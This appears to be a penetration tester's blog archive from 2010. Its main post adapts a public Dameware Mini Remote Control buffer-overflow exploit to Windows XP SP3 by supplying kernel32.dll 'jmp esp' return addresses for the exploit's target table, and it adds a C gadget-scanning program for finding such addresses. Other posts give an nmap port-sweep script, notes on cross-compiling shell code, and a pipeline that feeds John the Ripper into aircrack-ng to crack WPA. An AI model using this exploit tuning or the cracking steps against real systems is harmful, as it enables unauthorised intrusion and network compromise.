A follow-up on the Dameware post. After updating to the latest SP3 hotfixes and patches, the memory address of the "jmp esp" instruction in kernel32.dll has changed again.
At the time of this post, the new address is:
0x7C874413
Thursday, May 27, 2010
Wednesday, May 26, 2010
Dameware Mini Remote Control Client Agent Exploit Windows XP SP3
/Start update 3/2/2011
After updating to the latest SP3 hotfixes and patches, the memory address of the "jmp esp" instruction in kernel32.dll has changed again.
At the time of this post, the new address is:
0x7C874413
/End update
An oldie, but during a pentest the client was running an old version of Dameware on Windows XP SP3, which the exploit code referenced above does not support out of the box.
The relevant lines are where the code defines the static return addresses it uses to reach a "jmp esp" instruction:
target_os[] = ...
"WIN XP" ,{{ 0x71ab7bfb,"kernel32.dll" },{ 0x71ab7bfb,"ws2_32.dll" },{ 0x7C941EED,"ws2_32.dll" },{ 0x00000000,"unknown.dll" },{ 0x00000000,"unknown.dll" },{ 0x00000000,"unknown.dll" },{ 0x00000000,"unknown.dll" }}},
...
We can see that item "3" is set to 0x00000000 and "unknown.dll". This placeholder is the slot for XP SP3.
Using Immunity Debugger and sifting through Dameware's modules, I found that it is using kernel32.dll's jmp esp.
Thus, replace item 3 with 0x7C86467B, "kernel32.dll" to make the script support Windows XP SP3. Note that this address is tied to the exact kernel32.dll build on the target: the 3/2/2011 update above records that it moved to 0x7C874413 after later hotfixes, so confirm it in a debugger against the target's patch level first.
Like most buffer overflow exploits, this one gives you only one shot before the service is nuked. Double-check the address and test the exploit before carrying it out.
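As an added example (not code from the original post or from the exploit it modifies), the following C program does offline what the post did in Immunity Debugger: it scans a byte image for x86 sequences that transfer control to ESP, reports them as absolute addresses, and rejects candidates containing a NUL byte, a common bad character in string-based overflows. It goes slightly beyond the post by also matching `call esp` and `push esp; ret`, which serve the same purpose when a module has no plain `jmp esp`. The byte buffer is constructed for demonstration and 0x7C800000 is only an assumed load base; to get usable addresses, feed it the bytes of the target's own kernel32.dll code section at its real base, which is exactly why the address changes between hotfix levels.

```c
/* Added example, not from the original post: find "jmp esp"-style gadgets in
 * a byte image and print them as absolute addresses. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

typedef struct {
    const unsigned char *bytes;
    size_t len;
    const char *name;
} gadget_pattern;

/* x86 sequences that transfer control to ESP: the one the exploit's target
 * table wants, plus two equivalents for modules lacking a plain jmp esp. */
static const gadget_pattern patterns[] = {
    { (const unsigned char *)"\xff\xe4", 2, "jmp esp" },
    { (const unsigned char *)"\xff\xd4", 2, "call esp" },
    { (const unsigned char *)"\x54\xc3", 2, "push esp; ret" },
};

typedef struct {
    uint32_t addr;      /* base + offset of the gadget's first byte */
    const char *name;   /* which pattern matched */
} gadget_hit;

/* Scan buf[0..len) as if loaded at `base`; store up to max_hits results.
 * Returns the total number of gadgets found, even if not all were stored. */
size_t find_esp_gadgets(const unsigned char *buf, size_t len, uint32_t base,
                        gadget_hit *hits, size_t max_hits)
{
    size_t found = 0;
    for (size_t off = 0; off + 1 < len; off++) {
        for (size_t p = 0; p < sizeof patterns / sizeof patterns[0]; p++) {
            if (off + patterns[p].len <= len &&
                memcmp(buf + off, patterns[p].bytes, patterns[p].len) == 0) {
                if (found < max_hits) {
                    hits[found].addr = base + (uint32_t)off;
                    hits[found].name = patterns[p].name;
                }
                found++;
            }
        }
    }
    return found;
}

/* 1 if any byte of the little-endian address equals `bad` (e.g. 0x00). A
 * return address containing a bad character would truncate or corrupt the
 * overflow string, so such candidates must be skipped. */
int addr_has_byte(uint32_t addr, unsigned char bad)
{
    for (int i = 0; i < 4; i++)
        if (((addr >> (8 * i)) & 0xffu) == bad)
            return 1;
    return 0;
}

/* Constructed sample "code section" for demonstration only; these are NOT
 * real kernel32.dll bytes. Offsets of the planted gadgets are commented. */
static const unsigned char sample_text[] = {
    0x55, 0x8b, 0xec,   /* 0: push ebp; mov ebp, esp   (no gadget)  */
    0xff, 0xe4,         /* 3: jmp esp                                */
    0x90, 0x90,         /* 5: nop; nop                               */
    0x54, 0xc3,         /* 7: push esp; ret                          */
    0xff, 0xd4,         /* 9: call esp                               */
    0xc3                /* 11: ret                                   */
};
/* Assumed load base; matches the range the post's kernel32 addresses fall in. */
#define SAMPLE_BASE 0x7C800000u

size_t scan_sample(gadget_hit *hits, size_t max_hits)
{
    return find_esp_gadgets(sample_text, sizeof sample_text, SAMPLE_BASE,
                            hits, max_hits);
}

int main(void)
{
    gadget_hit hits[16];
    size_t n = scan_sample(hits, 16);
    for (size_t i = 0; i < n && i < 16; i++) {
        /* Only addresses free of NUL bytes are usable in the exploit's table. */
        if (addr_has_byte(hits[i].addr, 0x00))
            continue;
        printf("0x%08X  %s\n", hits[i].addr, hits[i].name);
    }
    return 0;
}
```

Run against a real image by reading the module's code section into a buffer and passing its actual virtual address as `base`; the printed address (with its module name) is what goes into the `target_os[]` slot.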
Tuesday, May 25, 2010
Tabnabbing
A new type of phishing. This is ingenious:
Sunday, May 16, 2010
Port sweep
Quick and dirty portsweep script:
#!/bin/sh
# Usage: ./port_scan.sh [hostlist_file] [port]
# hostlist_file holds one network base address per line (e.g. 10.1.2.0);
# each is swept as a /24 for the given port.
# Note: [ "$1" == "" ] is not POSIX and fails under dash (/bin/sh on
# Ubuntu-based BT4), so the tests use -z instead.
if [ -z "$1" ] || [ -z "$2" ]
then
    echo "./port_scan.sh [hostlist_file] [port]"
else
    for host in `cat "$1"`
    do
        echo "scanning $host"
        # -oG: grepable output; -Pn: skip host discovery (the old -P0 spelling)
        nmap -oG "$host-$2.out" -v "$host/24" -p"$2" -Pn
    done
    # Grepable lines look like "Host: 10.1.2.3 ()  Ports: 22/open/tcp//ssh///";
    # field 2 is the IP even when grep prefixes the file name.
    grep open *"$2".out | cut -d" " -f2 > "$2.lst"
fi
*.lst contains a list of IPs only.
Saturday, May 15, 2010
Thursday, May 13, 2010
Friday, May 7, 2010
Cross-Compiling on BT4
#cd /root/.wine/drive_c/MinGW/bin
#wine gcc.exe [file].c -o [output]
Often the code will use Winsock (for initiating shells over TCP); in that case link against ws2_32 with the -lws2_32 flag, placed after the source file so the linker resolves its symbols:
-lws2_32
#wine gcc.exe [file].c -o [output] -lws2_32
Wednesday, May 5, 2010
Monday, May 3, 2010
Converting and Merging capture (.cap) files
Convert:
ivstools --convert [cap_file] [converted_file_name]
ivstools --convert airportSniff2NfxpB.cap sniff.ivs
Note that --convert keeps only the WEP initialization vectors, so the much smaller .ivs file is useful for WEP cracking only; keep the original .cap if you need the full frames (e.g. a WPA handshake).
Merging:
ivstools --merge [ivs_file1] [ivs_file2] ... [merged_output_file_name]
ivstools --merge sniff1.ivs sniff2.ivs sniff_out.ivs
Saturday, May 1, 2010
Piping JTR to Aircrack
./john --incremental=All --stdout | aircrack-ng -e [ssid] -w - [capture_file]
--stdout makes john print its candidate passwords instead of cracking with them, and -w - makes aircrack-ng read its wordlist from stdin. Since WPA passphrases are 8 to 63 characters, aircrack-ng simply skips the shorter candidates that incremental mode produces first.
Ex: